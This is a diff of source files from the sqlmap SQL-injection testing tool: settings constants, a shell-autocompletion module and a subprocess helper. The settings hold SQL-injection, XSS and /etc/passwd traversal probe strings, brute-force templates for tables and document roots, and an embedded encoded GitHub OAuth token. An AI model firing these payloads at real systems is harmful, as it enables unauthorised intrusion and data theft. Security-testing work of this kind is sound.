'rz', 's3m', 's7z', 'scm', 'scpt', 'sgi', 'shar', 'sil', 'smv', 'so', 'sub', 'swf', 'tar', 'tbz2', 'tga', 'tgz', 'tif', 'tiff', 'tlz', 'ts', 'ttf', 'uvh', 'uvi', 'uvm', 'uvp', 'uvs', 'uvu', 'viv', 'vob', 'war', 'wav', 'wax', 'wbmp', 'wdp', 'weba', 'webm', 'webp', 'whl', 'wm', 'wma', 'wmv', 'wmx', 'woff', 'woff2', 'wvx', 'xbm', 'xif', 'xls', 'xlsx', 'xlt', 'xm', 'xpi', 'xpm', 'xwd', 'xz', 'z', 'zip', 'zipx')
|
||||||
|
|
||||||
|
# Patterns often seen in HTTP headers containing custom injection marking character
|
||||||
|
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
|
||||||
|
|
||||||
|
# Template used for common table existence check
|
||||||
|
BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
|
||||||
|
|
||||||
|
# Template used for common column existence check
|
||||||
|
BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
|
||||||
|
|
||||||
|
# Payload used for checking of existence of IDS/WAF (dummier the better)
|
||||||
|
IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/../../../etc/passwd"
|
||||||
|
|
||||||
|
# Data inside shellcodeexec to be filled with random string
|
||||||
|
SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
||||||
|
|
||||||
|
# Vectors used for provoking specific WAF/IDS/IPS behavior(s)
|
||||||
|
WAF_ATTACK_VECTORS = (
|
||||||
|
"", # NIL
|
||||||
|
"search=<script>alert(1)</script>",
|
||||||
|
"file=../../../../etc/passwd",
|
||||||
|
"q=<invalid>foobar",
|
||||||
|
"id=1 %s" % IDS_WAF_CHECK_PAYLOAD
|
||||||
|
)
|
||||||
|
|
||||||
|
# Used for status representation in dictionary attack phase
|
||||||
|
ROTATING_CHARS = ('\\', '|', '|', '/', '-')
|
||||||
|
|
||||||
|
# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
|
||||||
|
BIGARRAY_CHUNK_SIZE = 1024 * 1024
|
||||||
|
|
||||||
|
# Maximum number of socket pre-connects
|
||||||
|
SOCKET_PRE_CONNECT_QUEUE_SIZE = 3
|
||||||
|
|
||||||
|
# Only console display last n table rows
|
||||||
|
TRIM_STDOUT_DUMP_SIZE = 256
|
||||||
|
|
||||||
|
# Reference: http://stackoverflow.com/a/3168436
|
||||||
|
# Reference: https://support.microsoft.com/en-us/kb/899149
|
||||||
|
DUMP_FILE_BUFFER_SIZE = 1024
|
||||||
|
|
||||||
|
# Parse response headers only first couple of times
|
||||||
|
PARSE_HEADERS_LIMIT = 3
|
||||||
|
|
||||||
|
# Step used in ORDER BY technique used for finding the right number of columns in UNION query injections
|
||||||
|
ORDER_BY_STEP = 10
|
||||||
|
|
||||||
|
# Maximum number of times for revalidation of a character in time-based injections
|
||||||
|
MAX_TIME_REVALIDATION_STEPS = 5
|
||||||
|
|
||||||
|
# Characters that can be used to split parameter values in provided command line (e.g. in --tamper)
|
||||||
|
PARAMETER_SPLITTING_REGEX = r'[,|;]'
|
||||||
|
|
||||||
|
# Regular expression describing possible union char value (e.g. used in --union-char)
|
||||||
|
UNION_CHAR_REGEX = r'\A\w+\Z'
|
||||||
|
|
||||||
|
# Attribute used for storing original parameter value in special cases (e.g. POST)
|
||||||
|
UNENCODED_ORIGINAL_VALUE = 'original'
|
||||||
|
|
||||||
|
# Common column names containing usernames (used for hash cracking in some cases)
|
||||||
|
COMMON_USER_COLUMNS = ('user', 'username', 'user_name', 'benutzername', 'benutzer', 'utilisateur', 'usager', 'consommateur', 'utente', 'utilizzatore', 'usufrutuario', 'korisnik', 'usuario', 'consumidor')
|
||||||
|
|
||||||
|
# Default delimiter in GET/POST values
|
||||||
|
DEFAULT_GET_POST_DELIMITER = '&'
|
||||||
|
|
||||||
|
# Default delimiter in cookie values
|
||||||
|
DEFAULT_COOKIE_DELIMITER = ';'
|
||||||
|
|
||||||
|
# Unix timestamp used for forcing cookie expiration when provided with --load-cookies
|
||||||
|
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
|
||||||
|
|
||||||
|
# Github OAuth token used for creating an automatic Issue for unhandled exceptions
|
||||||
|
GITHUB_REPORT_OAUTH_TOKEN = "YzNkYTgyMTdjYzdjNjZjMjFjMWE5ODI5OGQyNzk2ODM1M2M0MzUyOA=="
|
||||||
|
|
||||||
|
# Skip unforced HashDB flush requests below the threshold number of cached items
|
||||||
|
HASHDB_FLUSH_THRESHOLD = 32
|
||||||
|
|
||||||
|
# Number of retries for unsuccessful HashDB flush attempts
|
||||||
|
HASHDB_FLUSH_RETRIES = 3
|
||||||
|
|
||||||
|
# Number of retries for unsuccessful HashDB end transaction attempts
|
||||||
|
HASHDB_END_TRANSACTION_RETRIES = 3
|
||||||
|
|
||||||
|
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
|
||||||
|
HASHDB_MILESTONE_VALUE = "ERqvmQHalF" # "".join(random.sample(string.ascii_letters, 10))
|
||||||
|
|
||||||
|
# Warn user of possible delay due to large page dump in full UNION query injections
|
||||||
|
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
|
||||||
|
|
||||||
|
# On huge tables there is a considerable slowdown if every row retrieval requires ORDER BY (most noticable in table dumping using ERROR injections)
|
||||||
|
SLOW_ORDER_COUNT_THRESHOLD = 10000
|
||||||
|
|
||||||
|
# Give up on hash recognition if nothing was found in first given number of rows
|
||||||
|
HASH_RECOGNITION_QUIT_THRESHOLD = 10000
|
||||||
|
|
||||||
|
# Maximum number of redirections to any single URL - this is needed because of the state that cookies introduce
|
||||||
|
MAX_SINGLE_URL_REDIRECTIONS = 4
|
||||||
|
|
||||||
|
# Maximum total number of redirections (regardless of URL) - before assuming we're in a loop
|
||||||
|
MAX_TOTAL_REDIRECTIONS = 10
|
||||||
|
|
||||||
|
# Reference: http://www.tcpipguide.com/free/t_DNSLabelsNamesandSyntaxRules.htm
|
||||||
|
MAX_DNS_LABEL = 63
|
||||||
|
|
||||||
|
# Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content)
|
||||||
|
DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
|
||||||
|
|
||||||
|
# Alphabet used for heuristic checks
|
||||||
|
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
|
||||||
|
|
||||||
|
# String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value
|
||||||
|
DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"
|
||||||
|
|
||||||
|
# Regular expression used for recognition of file inclusion errors
|
||||||
|
FI_ERROR_REGEX = "(?i)[^\n]*(no such file|failed (to )?open)[^\n]*"
|
||||||
|
|
||||||
|
# Length of prefix and suffix used in non-SQLI heuristic checks
|
||||||
|
NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
|
||||||
|
|
||||||
|
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
|
||||||
|
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
||||||
|
|
||||||
|
# Maximum response total page size (trimmed if larger)
|
||||||
|
MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
|
||||||
|
|
||||||
|
# Maximum (multi-threaded) length of entry in bisection algorithm
|
||||||
|
MAX_BISECTION_LENGTH = 50 * 1024 * 1024
|
||||||
|
|
||||||
|
# Mark used for trimming unnecessary content in large chunks
|
||||||
|
LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__"
|
||||||
|
|
||||||
|
# Generic SQL comment formation
|
||||||
|
GENERIC_SQL_COMMENT = "-- [RANDSTR]"
|
||||||
|
|
||||||
|
# Threshold value for turning back on time auto-adjustment mechanism
|
||||||
|
VALID_TIME_CHARS_RUN_THRESHOLD = 100
|
||||||
|
|
||||||
|
# Check for empty columns only if table is sufficiently large
|
||||||
|
CHECK_ZERO_COLUMNS_THRESHOLD = 10
|
||||||
|
|
||||||
|
# Boldify all logger messages containing these "patterns"
|
||||||
|
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved")
|
||||||
|
|
||||||
|
# Generic www root directory names
|
||||||
|
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
||||||
|
|
||||||
|
# Maximum length of a help part containing switch/option name(s)
|
||||||
|
MAX_HELP_OPTION_LENGTH = 18
|
||||||
|
|
||||||
|
# Maximum number of connection retries (to prevent problems with recursion)
|
||||||
|
MAX_CONNECT_RETRIES = 100
|
||||||
|
|
||||||
|
# Strings for detecting formatting errors
|
||||||
|
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "DataTypeMismatchException")
|
||||||
|
|
||||||
|
# Regular expression used for extracting ASP.NET view state values
|
||||||
|
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
|
||||||
|
|
||||||
|
# Regular expression used for extracting ASP.NET event validation values
|
||||||
|
EVENTVALIDATION_REGEX = r'(?i)(?P<name>__EVENTVALIDATION[^"]*)[^>]+value="(?P<result>[^"]+)'
|
||||||
|
|
||||||
|
# Number of rows to generate inside the full union test for limited output (mustn't be too large to prevent payload length problems)
|
||||||
|
LIMITED_ROWS_TEST_NUMBER = 15
|
||||||
|
|
||||||
|
# Default adapter to use for bottle server
|
||||||
|
RESTAPI_DEFAULT_ADAPTER = "wsgiref"
|
||||||
|
|
||||||
|
# Default REST-JSON API server listen address
|
||||||
|
RESTAPI_DEFAULT_ADDRESS = "127.0.0.1"
|
||||||
|
|
||||||
|
# Default REST-JSON API server listen port
|
||||||
|
RESTAPI_DEFAULT_PORT = 8775
|
||||||
|
|
||||||
|
# Format used for representing invalid unicode characters
|
||||||
|
INVALID_UNICODE_CHAR_FORMAT = r"\x%02x"
|
||||||
|
|
||||||
|
# Regular expression for XML POST data
|
||||||
|
XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z"
|
||||||
|
|
||||||
|
# Regular expression used for detecting JSON POST data
|
||||||
|
JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z'
|
||||||
|
|
||||||
|
# Regular expression used for detecting JSON-like POST data
|
||||||
|
JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+).*\}\s*(\]\s*)*\Z"
|
||||||
|
|
||||||
|
# Regular expression used for detecting multipart POST data
|
||||||
|
MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="
|
||||||
|
|
||||||
|
# Regular expression used for detecting Array-like POST data
|
||||||
|
ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\]=.+%s\2\[\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER)
|
||||||
|
|
||||||
|
# Default POST data content-type
|
||||||
|
DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8"
|
||||||
|
|
||||||
|
# Raw text POST data content-type
|
||||||
|
PLAIN_TEXT_CONTENT_TYPE = "text/plain; charset=utf-8"
|
||||||
|
|
||||||
|
# Length used while checking for existence of Suhosin-patch (like) protection mechanism
|
||||||
|
SUHOSIN_MAX_VALUE_LENGTH = 512
|
||||||
|
|
||||||
|
# Minimum size of an (binary) entry before it can be considered for dumping to disk
|
||||||
|
MIN_BINARY_DISK_DUMP_SIZE = 100
|
||||||
|
|
||||||
|
# Regular expression used for extracting form tags
|
||||||
|
FORM_SEARCH_REGEX = r"(?si)<form(?!.+<form).+?</form>"
|
||||||
|
|
||||||
|
# Maximum number of lines to save in history file
|
||||||
|
MAX_HISTORY_LENGTH = 1000
|
||||||
|
|
||||||
|
# Minimum field entry length needed for encoded content (hex, base64,...) check
|
||||||
|
MIN_ENCODED_LEN_CHECK = 5
|
||||||
|
|
||||||
|
# Timeout in seconds in which Metasploit remote session has to be initialized
|
||||||
|
METASPLOIT_SESSION_TIMEOUT = 300
|
||||||
|
|
||||||
|
# Reference: http://www.postgresql.org/docs/9.0/static/catalog-pg-largeobject.html
|
||||||
|
LOBLKSIZE = 2048
|
||||||
|
|
||||||
|
# Suffix used to mark variables having keyword names
|
||||||
|
EVALCODE_KEYWORD_SUFFIX = "_KEYWORD"
|
||||||
|
|
||||||
|
# Reference: http://www.cookiecentral.com/faq/#3.5
|
||||||
|
NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
|
||||||
|
|
||||||
|
# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
|
||||||
|
CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")
|
||||||
|
|
||||||
|
# Prefixes used in brute force search for web server document root
|
||||||
|
BRUTE_DOC_ROOT_PREFIXES = {
|
||||||
|
OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),
|
||||||
|
OS.WINDOWS: ("/xampp", "/Program Files/xampp", "/wamp", "/Program Files/wampp", "/apache", "/Program Files/Apache Group/Apache", "/Program Files/Apache Group/Apache2", "/Program Files/Apache Group/Apache2.2", "/Program Files/Apache Group/Apache2.4", "/Inetpub/wwwroot", "/Inetpub/wwwroot/%TARGET%", "/Inetpub/vhosts/%TARGET%")
|
||||||
|
}
|
||||||
|
|
||||||
|
# Suffixes used in brute force search for web server document root
|
||||||
|
BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "www", "data", "sites/all", "www/build")
|
||||||
|
|
||||||
|
# String used for marking target name inside used brute force web server document root
|
||||||
|
BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
|
||||||
|
|
||||||
|
# Character used as a boundary in kb.chars (preferably less frequent letter)
|
||||||
|
KB_CHARS_BOUNDARY_CHAR = 'q'
|
||||||
|
|
||||||
|
# Letters of lower frequency used in kb.chars
|
||||||
|
KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp"
|
||||||
|
|
||||||
|
# CSS style used in HTML dump format
|
||||||
|
HTML_DUMP_CSS_STYLE = """<style>
|
||||||
|
table{
|
||||||
|
margin:10;
|
||||||
|
background-color:#FFFFFF;
|
||||||
|
font-family:verdana;
|
||||||
|
font-size:12px;
|
||||||
|
align:center;
|
||||||
|
}
|
||||||
|
thead{
|
||||||
|
font-weight:bold;
|
||||||
|
background-color:#4F81BD;
|
||||||
|
color:#FFFFFF;
|
||||||
|
}
|
||||||
|
tr:nth-child(even) {
|
||||||
|
background-color: #D3DFEE
|
||||||
|
}
|
||||||
|
td{
|
||||||
|
font-size:10px;
|
||||||
|
}
|
||||||
|
th{
|
||||||
|
font-size:10px;
|
||||||
|
}
|
||||||
|
</style>"""
|
||||||
|
|||||||
@@ -1,68 +1,24 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
import atexit
|
import atexit
|
||||||
import os
|
import os
|
||||||
import rlcompleter
|
|
||||||
|
|
||||||
from lib.core import readlineng as readline
|
from lib.core import readlineng as readline
|
||||||
from lib.core.data import kb
|
from lib.core.data import logger
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
from lib.core.data import queries
|
from lib.core.enums import AUTOCOMPLETE_TYPE
|
||||||
|
from lib.core.enums import OS
|
||||||
|
from lib.core.settings import MAX_HISTORY_LENGTH
|
||||||
|
|
||||||
|
try:
|
||||||
|
import rlcompleter
|
||||||
|
|
||||||
def saveHistory():
|
class CompleterNG(rlcompleter.Completer):
|
||||||
historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
|
|
||||||
readline.write_history_file(historyPath)
|
|
||||||
|
|
||||||
|
|
||||||
def loadHistory():
|
|
||||||
historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
|
|
||||||
|
|
||||||
if os.path.exists(historyPath):
|
|
||||||
readline.read_history_file(historyPath)
|
|
||||||
|
|
||||||
|
|
||||||
def queriesForAutoCompletion():
|
|
||||||
autoComplQueries = {}
|
|
||||||
|
|
||||||
for _, query in queries[kb.dbms].items():
|
|
||||||
if isinstance(query, str) and len(query) > 1:
|
|
||||||
autoComplQuery = query
|
|
||||||
elif isinstance(query, dict) and "inband" in query:
|
|
||||||
autoComplQuery = query["inband"]["query"]
|
|
||||||
else:
|
|
||||||
continue
|
|
||||||
|
|
||||||
autoComplQueries[autoComplQuery] = None
|
|
||||||
|
|
||||||
return autoComplQueries
|
|
||||||
|
|
||||||
|
|
||||||
class CompleterNG(rlcompleter.Completer):
|
|
||||||
def global_matches(self, text):
|
def global_matches(self, text):
|
||||||
"""
|
"""
|
||||||
Compute matches when text is a simple name.
|
Compute matches when text is a simple name.
|
||||||
@@ -73,33 +29,104 @@ class CompleterNG(rlcompleter.Completer):
|
|||||||
matches = []
|
matches = []
|
||||||
n = len(text)
|
n = len(text)
|
||||||
|
|
||||||
for list in [ self.namespace ]:
|
for ns in (self.namespace,):
|
||||||
for word in list:
|
for word in ns:
|
||||||
if word[:n] == text:
|
if word[:n] == text:
|
||||||
matches.append(word)
|
matches.append(word)
|
||||||
|
|
||||||
return matches
|
return matches
|
||||||
|
except:
|
||||||
|
readline._readline = None
|
||||||
|
|
||||||
|
def readlineAvailable():
|
||||||
|
"""
|
||||||
|
Check if the readline is available. By default
|
||||||
|
it is not in Python default installation on Windows
|
||||||
|
"""
|
||||||
|
|
||||||
def autoCompletion(sqlShell=False, osShell=False):
|
return readline._readline is not None
|
||||||
# First of all we check if the readline is available, by default
|
|
||||||
# it is not in Python default installation on Windows
|
def clearHistory():
|
||||||
if not readline.haveReadline:
|
if not readlineAvailable():
|
||||||
return
|
return
|
||||||
|
|
||||||
if sqlShell:
|
readline.clear_history()
|
||||||
completer = CompleterNG(queriesForAutoCompletion())
|
|
||||||
elif osShell:
|
def saveHistory(completion=None):
|
||||||
# TODO: add more operating system commands; differentiate commands
|
if not readlineAvailable():
|
||||||
# based on future operating system fingerprint
|
return
|
||||||
|
|
||||||
|
if completion == AUTOCOMPLETE_TYPE.SQL:
|
||||||
|
historyPath = paths.SQL_SHELL_HISTORY
|
||||||
|
elif completion == AUTOCOMPLETE_TYPE.OS:
|
||||||
|
historyPath = paths.OS_SHELL_HISTORY
|
||||||
|
else:
|
||||||
|
historyPath = paths.SQLMAP_SHELL_HISTORY
|
||||||
|
|
||||||
|
try:
|
||||||
|
with open(historyPath, "w+"):
|
||||||
|
pass
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
readline.set_history_length(MAX_HISTORY_LENGTH)
|
||||||
|
try:
|
||||||
|
readline.write_history_file(historyPath)
|
||||||
|
except IOError, msg:
|
||||||
|
warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg)
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
def loadHistory(completion=None):
|
||||||
|
if not readlineAvailable():
|
||||||
|
return
|
||||||
|
|
||||||
|
clearHistory()
|
||||||
|
|
||||||
|
if completion == AUTOCOMPLETE_TYPE.SQL:
|
||||||
|
historyPath = paths.SQL_SHELL_HISTORY
|
||||||
|
elif completion == AUTOCOMPLETE_TYPE.OS:
|
||||||
|
historyPath = paths.OS_SHELL_HISTORY
|
||||||
|
else:
|
||||||
|
historyPath = paths.SQLMAP_SHELL_HISTORY
|
||||||
|
|
||||||
|
if os.path.exists(historyPath):
|
||||||
|
try:
|
||||||
|
readline.read_history_file(historyPath)
|
||||||
|
except IOError, msg:
|
||||||
|
warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, msg)
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
def autoCompletion(completion=None, os=None, commands=None):
|
||||||
|
if not readlineAvailable():
|
||||||
|
return
|
||||||
|
|
||||||
|
if completion == AUTOCOMPLETE_TYPE.OS:
|
||||||
|
if os == OS.WINDOWS:
|
||||||
|
# Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
|
||||||
completer = CompleterNG({
|
completer = CompleterNG({
|
||||||
"id": None, "ifconfig": None, "ls": None,
|
"copy": None, "del": None, "dir": None,
|
||||||
"netstat -natu": None, "pwd": None,
|
"echo": None, "md": None, "mem": None,
|
||||||
"uname": None, "whoami": None,
|
"move": None, "net": None, "netstat -na": None,
|
||||||
|
"ver": None, "xcopy": None, "whoami": None,
|
||||||
|
})
|
||||||
|
|
||||||
|
else:
|
||||||
|
# Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands
|
||||||
|
completer = CompleterNG({
|
||||||
|
"cp": None, "rm": None, "ls": None,
|
||||||
|
"echo": None, "mkdir": None, "free": None,
|
||||||
|
"mv": None, "ifconfig": None, "netstat -natu": None,
|
||||||
|
"pwd": None, "uname": None, "id": None,
|
||||||
})
|
})
|
||||||
|
|
||||||
readline.set_completer(completer.complete)
|
readline.set_completer(completer.complete)
|
||||||
readline.parse_and_bind("tab: complete")
|
readline.parse_and_bind("tab: complete")
|
||||||
|
|
||||||
loadHistory()
|
elif commands:
|
||||||
atexit.register(saveHistory)
|
completer = CompleterNG(dict(((_, None) for _ in commands)))
|
||||||
|
readline.set_completer_delims(' ')
|
||||||
|
readline.set_completer(completer.complete)
|
||||||
|
readline.parse_and_bind("tab: complete")
|
||||||
|
|
||||||
|
loadHistory(completion)
|
||||||
|
atexit.register(saveHistory, completion)
|
||||||
|
|||||||
202
lib/core/subprocessng.py
Normal file
202
lib/core/subprocessng.py
Normal file
@@ -0,0 +1,202 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
import errno
|
||||||
|
import os
|
||||||
|
import subprocess
|
||||||
|
import sys
|
||||||
|
import time
|
||||||
|
|
||||||
|
from lib.core.settings import IS_WIN
|
||||||
|
|
||||||
|
if IS_WIN:
|
||||||
|
try:
|
||||||
|
from win32file import ReadFile, WriteFile
|
||||||
|
from win32pipe import PeekNamedPipe
|
||||||
|
except ImportError:
|
||||||
|
pass
|
||||||
|
import msvcrt
|
||||||
|
else:
|
||||||
|
import select
|
||||||
|
import fcntl
|
||||||
|
|
||||||
|
if (sys.hexversion >> 16) >= 0x202:
|
||||||
|
FCNTL = fcntl
|
||||||
|
else:
|
||||||
|
import FCNTL
|
||||||
|
|
||||||
|
def blockingReadFromFD(fd):
|
||||||
|
# Quick twist around original Twisted function
|
||||||
|
# Blocking read from a non-blocking file descriptor
|
||||||
|
output = ""
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
output += os.read(fd, 8192)
|
||||||
|
except (OSError, IOError), ioe:
|
||||||
|
if ioe.args[0] in (errno.EAGAIN, errno.EINTR):
|
||||||
|
# Uncomment the following line if the process seems to
|
||||||
|
# take a huge amount of cpu time
|
||||||
|
# time.sleep(0.01)
|
||||||
|
continue
|
||||||
|
else:
|
||||||
|
raise
|
||||||
|
break
|
||||||
|
|
||||||
|
if not output:
|
||||||
|
raise EOFError("fd %s has been closed." % fd)
|
||||||
|
|
||||||
|
return output
|
||||||
|
|
||||||
|
def blockingWriteToFD(fd, data):
|
||||||
|
# Another quick twist
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
data_length = len(data)
|
||||||
|
wrote_data = os.write(fd, data)
|
||||||
|
except (OSError, IOError), io:
|
||||||
|
if io.errno in (errno.EAGAIN, errno.EINTR):
|
||||||
|
continue
|
||||||
|
else:
|
||||||
|
raise
|
||||||
|
|
||||||
|
if wrote_data < data_length:
|
||||||
|
blockingWriteToFD(fd, data[wrote_data:])
|
||||||
|
|
||||||
|
break
|
||||||
|
|
||||||
|
# the following code is taken from http://code.activestate.com/recipes/440554-module-to-allow-asynchronous-subprocess-use-on-win/
|
||||||
|
class Popen(subprocess.Popen):
|
||||||
|
def recv(self, maxsize=None):
|
||||||
|
return self._recv('stdout', maxsize)
|
||||||
|
|
||||||
|
def recv_err(self, maxsize=None):
|
||||||
|
return self._recv('stderr', maxsize)
|
||||||
|
|
||||||
|
def send_recv(self, input='', maxsize=None):
|
||||||
|
return self.send(input), self.recv(maxsize), self.recv_err(maxsize)
|
||||||
|
|
||||||
|
def get_conn_maxsize(self, which, maxsize):
|
||||||
|
if maxsize is None:
|
||||||
|
maxsize = 1024
|
||||||
|
elif maxsize < 1:
|
||||||
|
maxsize = 1
|
||||||
|
return getattr(self, which), maxsize
|
||||||
|
|
||||||
|
def _close(self, which):
|
||||||
|
getattr(self, which).close()
|
||||||
|
setattr(self, which, None)
|
||||||
|
|
||||||
|
if subprocess.mswindows:
|
||||||
|
def send(self, input):
|
||||||
|
if not self.stdin:
|
||||||
|
return None
|
||||||
|
|
||||||
|
try:
|
||||||
|
x = msvcrt.get_osfhandle(self.stdin.fileno())
|
||||||
|
(errCode, written) = WriteFile(x, input)
|
||||||
|
except ValueError:
|
||||||
|
return self._close('stdin')
|
||||||
|
except (subprocess.pywintypes.error, Exception), why:
|
||||||
|
if why[0] in (109, errno.ESHUTDOWN):
|
||||||
|
return self._close('stdin')
|
||||||
|
raise
|
||||||
|
|
||||||
|
return written
|
||||||
|
|
||||||
|
def _recv(self, which, maxsize):
|
||||||
|
conn, maxsize = self.get_conn_maxsize(which, maxsize)
|
||||||
|
if conn is None:
|
||||||
|
return None
|
||||||
|
|
||||||
|
try:
|
||||||
|
x = msvcrt.get_osfhandle(conn.fileno())
|
||||||
|
(read, nAvail, nMessage) = PeekNamedPipe(x, 0)
|
||||||
|
if maxsize < nAvail:
|
||||||
|
nAvail = maxsize
|
||||||
|
if nAvail > 0:
|
||||||
|
(errCode, read) = ReadFile(x, nAvail, None)
|
||||||
|
except (ValueError, NameError):
|
||||||
|
return self._close(which)
|
||||||
|
except (subprocess.pywintypes.error, Exception), why:
|
||||||
|
if why[0] in (109, errno.ESHUTDOWN):
|
||||||
|
return self._close(which)
|
||||||
|
raise
|
||||||
|
|
||||||
|
if self.universal_newlines:
|
||||||
|
read = self._translate_newlines(read)
|
||||||
|
return read
|
||||||
|
else:
|
||||||
|
def send(self, input):
|
||||||
|
if not self.stdin:
|
||||||
|
return None
|
||||||
|
|
||||||
|
if not select.select([], [self.stdin], [], 0)[1]:
|
||||||
|
return 0
|
||||||
|
|
||||||
|
try:
|
||||||
|
written = os.write(self.stdin.fileno(), input)
|
||||||
|
except OSError, why:
|
||||||
|
if why[0] == errno.EPIPE: # broken pipe
|
||||||
|
return self._close('stdin')
|
||||||
|
raise
|
||||||
|
|
||||||
|
return written
|
||||||
|
|
||||||
|
def _recv(self, which, maxsize):
|
||||||
|
conn, maxsize = self.get_conn_maxsize(which, maxsize)
|
||||||
|
if conn is None:
|
||||||
|
return None
|
||||||
|
|
||||||
|
flags = fcntl.fcntl(conn, fcntl.F_GETFL)
|
||||||
|
if not conn.closed:
|
||||||
|
fcntl.fcntl(conn, fcntl.F_SETFL, flags | os.O_NONBLOCK)
|
||||||
|
|
||||||
|
try:
|
||||||
|
if not select.select([conn], [], [], 0)[0]:
|
||||||
|
return ''
|
||||||
|
|
||||||
|
r = conn.read(maxsize)
|
||||||
|
if not r:
|
||||||
|
return self._close(which)
|
||||||
|
|
||||||
|
if self.universal_newlines:
|
||||||
|
r = self._translate_newlines(r)
|
||||||
|
return r
|
||||||
|
